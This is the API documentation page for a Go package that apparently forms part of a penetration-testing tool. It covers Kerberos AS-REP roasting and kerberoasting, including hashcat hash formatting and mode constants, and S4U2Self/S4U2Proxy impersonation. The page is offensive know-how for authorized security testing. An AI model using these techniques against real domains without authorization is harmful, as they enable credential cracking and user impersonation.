kerberos

package
v0.0.190 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Jun 14, 2026 License: Apache-2.0 Imports: 30 Imported by: 0

Documentation

Index

Constants

View Source 
const (
	// AS-REP roast (krb5asrep). Hashcat ships only an RC4 mode for AS-REP;
	// AES AS-REP roast is not directly supported.
	HashcatModeASRepRoastRC4 = 18200

	// Kerberoast (krb5tgs) per ticket etype.
	HashcatModeKerberoastRC4    = 13100 // etype 23
	HashcatModeKerberoastAES128 = 19600 // etype 17
	HashcatModeKerberoastAES256 = 19700 // etype 18
)

Hashcat mode constants for each (operation, etype) pair. Hashcat doesn't have a single "kerberoast" or "AS-REP roast" mode — the mode is selected by both the attack and the ticket's encryption type, and a mismatched mode is silently uncrackable.

Reference: https://hashcat.net/wiki/doku.php?id=example_hashes

Variables

This section is empty.

Functions

func BuildASReq added in v0.0.190 

func BuildASReq(realm, principal string, cfg *config.Config) (messages.ASReq, error)

BuildASReq builds a raw AS-REQ for the specified realm and principal. The raw primitive path always omits PA-ENC-TIMESTAMP — the KDC will respond with KDC_ERR_PREAUTH_REQUIRED for pre-auth-enabled accounts (the probe signal) or an AS-REP for pre-auth-disabled accounts (the AS-REP-roast condition). Callers that need real PA-ENC-TIMESTAMP must go through the gokrb5 client.ASExchange path which encrypts the timestamp with the principal's key material; that's not modeled here because the raw primitive is intentionally credential-free.

func BuildTGSReqFromTGT added in v0.0.190 

func BuildTGSReqFromTGT(tgt messages.Ticket, sessionKey types.EncryptionKey, cname types.PrincipalName, realm, spn string, cfg *config.Config) (messages.TGSReq, error)

BuildTGSReqFromTGT builds a TGS-REQ using an existing TGT for the specified SPN.

func ExtractTicketCipher added in v0.0.190 

func ExtractTicketCipher(rep messages.TGSRep) (etype int32, cipher []byte)

ExtractTicketCipher extracts the encryption type and cipher from a TGS-REP for hashcat formatting.

func FormatASRepHashcat added in v0.0.190 

func FormatASRepHashcat(asrep messages.ASRep) string

FormatASRepHashcat formats an AS-REP response in hashcat $krb5asrep$ format. Returns empty string if the cipher is too short to format (< 16 bytes) or if hashcat doesn't have a mode for the etype (it's RC4-only). Format reference: hashcat example_hashes.txt mode 18200.

func FormatTGSRepHashcat added in v0.0.190 

func FormatTGSRepHashcat(rep messages.TGSRep) string

FormatTGSRepHashcat formats a TGS-REP in hashcat $krb5tgs$ format. Returns empty string if the ticket cipher is too short or if the etype isn't a known kerberoast etype.

Layouts (cross-checked against impacket GetUserSPNs.py and Rubeus):

  • RC4 (13100): $krb5tgs$23$*<svcName>$<realm>$<spn>*$<checksum[:16]>$<edata[16:]> checksum is the FIRST 16 bytes (RFC 4757 layout).
  • AES128 (19600) / AES256 (19700): $krb5tgs$<etype>$<svcName>$<realm>$*<spn>*$<HMAC[-12:]>$<edata[:-12]> HMAC-SHA1-96 is the LAST 12 bytes (RFC 3962 layout). The asterisks wrap the SPN — both impacket and Rubeus emit this shape and hashcat parses it.

The <svcName> field is the SPN extracted from the ticket's SName (the service account identifier as presented to hashcat). For AES modes the name is part of the key derivation salt, so it MUST identify the service account, not the authenticating user. When the SAM account name is not independently known (i.e. we obtained the TGS-REP without LDAP enumeration), embedding the SPN itself is the correct fallback — this is the same behaviour as impacket GetUserSPNs.py and Rubeus when no account mapping is available.

The earlier "AES is one blob with no asterisks" layout that lived here loaded into hashcat as garbage; AES kerberoasts looked successful in the report but never cracked. Spotted by Bugbot round-8.

func HashcatModeForASRep added in v0.0.190 

func HashcatModeForASRep(etype int32) (int, bool)

HashcatModeForASRep returns the hashcat mode for an AS-REP roast hash of the given etype, or (0, false) if hashcat doesn't have a mode for it. Only RC4 is supported for AS-REP roast.

func HashcatModeForTGSRep added in v0.0.190 

func HashcatModeForTGSRep(etype int32) (int, bool)

HashcatModeForTGSRep returns the hashcat mode for a kerberoast hash of the given TGS ticket etype, or (0, false) if hashcat doesn't have a mode for it.

func KerberosEtypeFromString added in v0.0.190 

func KerberosEtypeFromString(name string) (int32, bool)

KerberosEtypeFromString maps a KerberosEncryptionType string to the gokrb5 etype ID.

func LoadCCacheFromBase64 added in v0.0.190 

func LoadCCacheFromBase64(b string) (*credentials.CCache, error)

LoadCCacheFromBase64 decodes a base64-encoded CCache and unmarshals it.

func LoadTGTFromCCache added in v0.0.190 

func LoadTGTFromCCache(cache *credentials.CCache, realm string) (tgt messages.Ticket, sessionKey types.EncryptionKey, ok bool)

LoadTGTFromCCache walks a CCache looking for the krbtgt entry for the given realm. It returns the TGT ticket, session key, and true if found; otherwise false.

func LookupKrbErrName added in v0.0.190 

func LookupKrbErrName(code int32) string

LookupKrbErrName returns the symbolic name for a KDC error code. It uses the iana/errorcode.Lookup function which returns a full description string; this function extracts just the symbolic name prefix.

func SendASReqToKDC added in v0.0.190 

func SendASReqToKDC(host string, port int, asReq messages.ASReq, timeout time.Duration) (raw []byte, asRep *messages.ASRep, krbErr *messages.KRBError, err error)

SendASReqToKDC sends an AS-REQ to the KDC over TCP and returns the raw response bytes, parsed AS-REP (if received), KRB-ERROR (if received), and any network/parse error. Wire format: 4-byte BigEndian length prefix followed by the message body (RFC 4120 §7.2.2).

func SendTGSReqToKDC added in v0.0.190 

func SendTGSReqToKDC(host string, port int, tgsReq messages.TGSReq, timeout time.Duration) (raw []byte, tgsRep *messages.TGSRep, krbErr *messages.KRBError, err error)

SendTGSReqToKDC sends a TGS-REQ to the KDC over TCP and returns the raw response bytes, parsed TGS-REP (if received), KRB-ERROR (if received), and any network/parse error.

func WriteCCacheToFile added in v0.0.190 

func WriteCCacheToFile(cache *credentials.CCache, path string) error

WriteCCacheToFile marshals the CCache and writes it to the given path with 0600 permissions.

Types

type ClientManager 

type ClientManager struct {
	Config *config.Config
	Target *Target
	// contains filtered or unexported fields
}

ClientManager handles Kerberos client configuration and creation

func NewClientManager 

func NewClientManager(target *Target) *ClientManager

NewClientManager creates a new Kerberos client manager

func (*ClientManager) CreateClientFromConfig 

func (kcm *ClientManager) CreateClientFromConfig(pentestConfig *kerberosfern.PentestKerberosConfig) (*client.Client, string, error)

CreateClientFromConfig creates a Kerberos client from the provided config

func (*ClientManager) CreateConfiguration 

func (kcm *ClientManager) CreateConfiguration() *config.Config

CreateConfiguration creates a Kerberos configuration for the target

func (*ClientManager) WithEtypes added in v0.0.190 

func (kcm *ClientManager) WithEtypes(etypes []int32) *ClientManager

WithEtypes sets the etype preference order for the next CreateConfiguration call. Call before CreateConfiguration. Pass nil or empty to use defaults.

type S4UManager 

type S4UManager struct {
	Client *client.Client
	Config *config.Config
}

S4UManager handles Service for User (S4U) operations for Kerberos delegation

func NewS4UManager 

func NewS4UManager(client *client.Client, config *config.Config) *S4UManager

NewS4UManager creates a new S4U manager

func (*S4UManager) PerformS4U2Proxy 

func (s4u *S4UManager) PerformS4U2Proxy(ctx context.Context, requestingUser, userDomain, impersonateUser string, tgt, s4u2SelfTicket messages.Ticket, sessionKey types.EncryptionKey, spn string) (messages.Ticket, error)

PerformS4U2Proxy performs S4U2Proxy to get a service ticket for the target SPN. Returns the delegated service ticket (the SPN ticket, NOT the S4U2Self ticket) so callers can serialize it into a ccache / ticketBase64 and report the real SPN principal + encryption type instead of the impersonation token's metadata.

func (*S4UManager) PerformS4U2Self 

func (s4u *S4UManager) PerformS4U2Self(ctx context.Context, requestingUser, userDomain, impersonateUser string, tgt messages.Ticket, sessionKey types.EncryptionKey) (messages.Ticket, error)

PerformS4U2Self performs S4U2Self to get a service ticket for the impersonated user

type Target 

type Target struct {
	Host   string
	Port   int
	Domain string
}

Target represents a parsed Kerberos target

func ParseTarget 

func ParseTarget(targetStr string) (*Target, error)

ParseTarget parses a target string into a Target. For IP addresses the domain is left empty — callers must supply the realm via --domain when targeting IPs.

type TicketInfo added in v0.0.83 

type TicketInfo struct {
	Base64    string
	Principal string
	Realm     string

	// Enhanced ticket metadata
	ServicePrincipal    *string
	StartTime           *time.Time
	EndTime             *time.Time
	RenewUntil          *time.Time
	TicketFlags         *string
	EncryptionType      *string
	KeyVersionNumber    *int
	Algorithm           *string
	TicketVersionNumber *int
}

TicketInfo contains information extracted from a Kerberos ticket

type TicketManager 

type TicketManager struct {
	Client *client.Client
	Config *config.Config
}

TicketManager handles Kerberos ticket operations

func NewTicketManager 

func NewTicketManager(client *client.Client, config *config.Config) *TicketManager

NewTicketManager creates a new ticket manager

func (*TicketManager) GenerateTicketBase64 

func (tm *TicketManager) GenerateTicketBase64(impersonateUser, userDomain, spn string) (string, error)

GenerateTicketBase64 generates the acquired ticket as a base64-encoded ccache

func (*TicketManager) GetTGT 

func (tm *TicketManager) GetTGT(userDomain string) (messages.Ticket, types.EncryptionKey, error)

GetTGT retrieves a Ticket Granting Ticket for the specified domain

func (*TicketManager) RequestServiceTicket 

func (tm *TicketManager) RequestServiceTicket(ctx context.Context, requestingUser, userDomain, impersonateUser, spn string) (*TicketInfo, error)

RequestServiceTicket performs service ticket acquisition (with optional S4U2Self and S4U2Proxy for impersonation)

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.